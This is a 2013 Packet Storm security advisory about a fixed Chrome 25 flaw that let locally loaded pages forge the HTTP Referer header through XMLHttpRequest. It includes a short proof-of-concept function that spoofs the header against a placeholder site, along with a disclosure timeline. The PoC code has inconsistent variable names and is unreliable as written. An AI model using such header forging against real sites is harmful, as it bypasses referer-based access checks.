the original cloud security

Google Chrome 25.0.1364.152 HTTP Referer Header Faking

Google Chrome 25.0.1364.152 HTTP Referer Header Faking
Posted Jul 8, 2013
Authored by Liad Mizrachi

Google Chrome version 25.0.1364.152 suffers from an XMLHttpRequest HTTP Referer Header faking vulnerability.

tags | exploit, web
MD5 | 15f802508bdb3aa33531cdc6289be924

Google Chrome 25.0.1364.152 HTTP Referer Header Faking

Change Mirror Download
Advisory:                      XMLHttpRequest HTTP Referer Header Faking
Author: Liad Mizrachi
Vendor URL: http://www.chromium.org/
Vulnerability Status: Fixed
Application Version: Google Chrome v25.0.1364.152


==========================
Vulnerability Description
==========================

Chromium is the open source web browser project from which Google
Chrome draws its source code.

Chromium fails to validate the use of unsafe headers when the page is
load from the local drive, allowing to set and change the referer
header using "setRequestHeader" when generating a Ajax
(XMLHttpRequest) request.


==========================
PoC
==========================

function SendReq()
{
var xmlhttp = new XmlHttpRequest();
xmlHttp.onreadystatechange = readyStateChanged;
xmlHttp.open("GET", "http://AnySite.com/checkReferer.php", true);
xmlHttp.setRequestHeader("Referer", "http://valid.referer.com");
xmlHttp.send();
}


==========================
Solution
==========================

Block all scripts from setting unsafe headers in XMLHttpRequest.
- Fixed by vendor.



==========================
Disclosure Timeline
==========================

04-Mar-2013 - Google Security Team informed by mail.
14-Mar-2013 - Google Security Team Reply: "Since ChromeOS is an open
source project, please file the report directly in their bug tracker"
14-Mar-2013 - Security Bug Opened @ Chromium project.
30-Apr-2013 - Fixed.


==========================
References
==========================
http://www.chromium.org/
https://codereview.chromium.org/13979011/


Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    2 Files
  • 2
    Jul 2nd
    3 Files
  • 3
    Jul 3rd
    15 Files
  • 4
    Jul 4th
    4 Files
  • 5
    Jul 5th
    15 Files
  • 6
    Jul 6th
    15 Files
  • 7
    Jul 7th
    10 Files
  • 8
    Jul 8th
    2 Files
  • 9
    Jul 9th
    10 Files
  • 10
    Jul 10th
    15 Files
  • 11
    Jul 11th
    15 Files
  • 12
    Jul 12th
    19 Files
  • 13
    Jul 13th
    16 Files
  • 14
    Jul 14th
    15 Files
  • 15
    Jul 15th
    3 Files
  • 16
    Jul 16th
    2 Files
  • 17
    Jul 17th
    8 Files
  • 18
    Jul 18th
    11 Files
  • 19
    Jul 19th
    15 Files
  • 20
    Jul 20th
    15 Files
  • 21
    Jul 21st
    15 Files
  • 22
    Jul 22nd
    7 Files
  • 23
    Jul 23rd
    2 Files
  • 24
    Jul 24th
    19 Files
  • 25
    Jul 25th
    28 Files
  • 26
    Jul 26th
    2 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close